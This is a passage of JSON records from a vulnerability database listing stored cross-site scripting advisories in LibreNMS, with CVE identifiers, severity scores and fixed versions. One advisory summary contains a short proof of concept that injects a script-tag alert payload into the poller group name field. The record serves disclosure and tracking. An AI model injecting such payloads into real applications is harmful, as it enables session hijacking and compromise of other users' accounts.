mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-4979","GHSA-jp3c-g46v-jg2c"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-us6w-wwkm-dqc5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56216?format=json","vulnerability_id":"VCID-uuwy-rk5r-tkc7","summary":"LibreNMS has a stored XSS in ExamplePlugin with Device's Notes\nThe application fail to sanitising inputs properly and rendering the code from user input to browser which allow an attacker to execute malicious javascript code.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-49758","reference_id":"","reference_type":"","scores":[{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22314","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22329","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22416","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22429","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22367","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-49758"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/24b142d753898e273ec20b542a27dd6eb530c7d8","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:51:55Z/"}],"url":"https://github.com/librenms/librenms/commit/24b142d753898e273ec20b542a27dd6eb530c7d8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-49758","reference_id":"CVE-2024-49758","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-49758"},{"reference_url":"https://github.com/advisories/GHSA-c86q-rj37-8f85","reference_id":"GHSA-c86q-rj37-8f85","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c86q-rj37-8f85"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-c86q-rj37-8f85","reference_id":"GHSA-c86q-rj37-8f85","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:51:55Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-c86q-rj37-8f85"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-49758","GHSA-c86q-rj37-8f85"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uuwy-rk5r-tkc7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56211?format=json","vulnerability_id":"VCID-ux81-kyy9-bkaz","summary":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/capture.inc.php\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Capture Debug Information\" page allows authenticated users to inject arbitrary JavaScript through the \"hostname\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \"Capture Debug Information\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-49764","reference_id":"","reference_type":"","scores":[{"value":"0.00901","scoring_system":"epss","scoring_elements":"0.76075","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00901","scoring_system":"epss","scoring_elements":"0.76083","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00901","scoring_system":"epss","scoring_elements":"0.76086","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00901","scoring_system":"epss","scoring_elements":"0.76082","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00901","scoring_system":"epss","scoring_elements":"0.76061","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-49764"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:47:58Z/"}],"url":"https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-49764","reference_id":"CVE-2024-49764","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-49764"},{"reference_url":"https://github.com/advisories/GHSA-rmr4-x6c9-jc68","reference_id":"GHSA-rmr4-x6c9-jc68","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rmr4-x6c9-jc68"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68","reference_id":"GHSA-rmr4-x6c9-jc68","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:47:58Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-49764","GHSA-rmr4-x6c9-jc68"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ux81-kyy9-bkaz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57875?format=json","vulnerability_id":"VCID-uzy1-yh5d-dqbt","summary":"LibreNMS allows stored XSS in Alert Template name field\nA stored Cross-Site Scripting (XSS) vulnerability exists in LibreNMS (<= 25.6.0) in the Alert Template creation feature. This allows a user with the **admin role** to inject malicious JavaScript, which will be executed when the template is rendered, potentially compromising other admin accounts.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-55296","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04536","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.0455","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04526","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04558","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04502","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-55296"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/8ade3d827d317f5ac4b336617aafff865f825958","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-18T17:37:45Z/"}],"url":"https://github.com/librenms/librenms/commit/8ade3d827d317f5ac4b336617aafff865f825958"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-55296","reference_id":"CVE-2025-55296","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-55296"},{"reference_url":"https://github.com/advisories/GHSA-vxq6-8cwm-wj99","reference_id":"GHSA-vxq6-8cwm-wj99","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vxq6-8cwm-wj99"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-vxq6-8cwm-wj99","reference_id":"GHSA-vxq6-8cwm-wj99","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-18T17:37:45Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-vxq6-8cwm-wj99"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/86116?format=json","purl":"pkg:composer/librenms/librenms@25.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@25.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2025-55296","GHSA-vxq6-8cwm-wj99"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uzy1-yh5d-dqbt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57317?format=json","vulnerability_id":"VCID-v2sw-u952-7qfz","summary":"LibreNMS stored Cross-site Scripting vulnerability in poller group name\n### LibreNMS v25.4.0 suffers from Stored Cross-Site Scripting (XSS) Vulnerability in the 'group name' parameter of the 'http://localhost/poller/groups' form. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.\n\n## ---------------------------------POC-----------------------------\nBefore Setting: Enable 'distributed_poller' in http://localhost/settings/poller/distributed\n1. Attacker creates a new poller group and injects the payload in the 'group name' parameter\n```\npayload: <script>alert('XSS')</script>\n```\n2. Victim navigates to the 'http://localhost/addhost' to add a new host\n3. The payload is executed\n\ncode sink:\nhttps://github.com/librenms/librenms/blob/25.4.0/includes/html/pages/addhost.inc.php#L284","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-47931","reference_id":"","reference_type":"","scores":[{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00415","published_at":"2026-06-08T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00419","published_at":"2026-06-09T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00423","published_at":"2026-06-06T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00422","published_at":"2026-06-05T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00417","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-47931"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/blob/25.4.0/includes/html/pages/addhost.inc.php#L284","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-05-19T20:17:23Z/"}],"url":"https://github.com/librenms/librenms/blob/25.4.0/includes/html/pages/addhost.inc.php#L284"},{"reference_url":"https://github.com/librenms/librenms/commit/88fe1a7abdb500d9a2d4c45f9872df54c9ff8062","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-05-19T20:17:23Z/"}],"url":"https://github.com/librenms/librenms/commit/88fe1a7abdb500d9a2d4c45f9872df54c9ff8062"},{"reference_url":"https://github.com/librenms/librenms/pull/17603","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-05-19T20:17:23Z/"}],"url":"https://github.com/librenms/librenms/pull/17603"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-47931","reference_id":"CVE-2025-47931","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-47931"},{"reference_url":"https://github.com/advisories/GHSA-hxw5-9cc5-cmw5","reference_id":"GHSA-hxw5-9cc5-cmw5","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hxw5-9cc5-cmw5"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-hxw5-9cc5-cmw5","reference_id":"GHSA-hxw5-9cc5-cmw5","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-05-19T20:17:23Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-hxw5-9cc5-cmw5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/85166?format=json","purl":"pkg:composer/librenms/librenms@25.5.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@25.5.0"}],"aliases":["CVE-2025-47931","GHSA-hxw5-9cc5-cmw5"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v2sw-u952-7qfz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56196?format=json","vulnerability_id":"VCID-v3wv-6q6b-fqa3","summary":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/print-customoid.php\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Custom OID\" tab of a device allows authenticated users to inject arbitrary JavaScript through the \"unit\" parameter when creating a new OID. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, compromising their accounts and enabling unauthorized actions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-51497","reference_id":"","reference_type":"","scores":[{"value":"0.00904","scoring_system":"epss","scoring_elements":"0.76117","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00904","scoring_system":"epss","scoring_elements":"0.76125","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00904","scoring_system":"epss","scoring_elements":"0.76129","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00904","scoring_system":"epss","scoring_elements":"0.76124","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00904","scoring_system":"epss","scoring_elements":"0.76105","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-51497"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/42b156e42a3811c23758772ce8c63d4d3eaba59b","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T17:16:10Z/"}],"url":"https://github.com/librenms/librenms/commit/42b156e42a3811c23758772ce8c63d4d3eaba59b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-51497","reference_id":"CVE-2024-51497","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-51497"},{"reference_url":"https://github.com/advisories/GHSA-gv4m-f6fx-859x","reference_id":"GHSA-gv4m-f6fx-859x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gv4m-f6fx-859x"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-gv4m-f6fx-859x","reference_id":"GHSA-gv4m-f6fx-859x","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T17:16:10Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-gv4m-f6fx-859x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-51497","GHSA-gv4m-f6fx-859x"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v3wv-6q6b-fqa3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56217?format=json","vulnerability_id":"VCID-vepx-waum-1bfc","summary":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/overview/services.inc.php\nA Stored Cross-Site 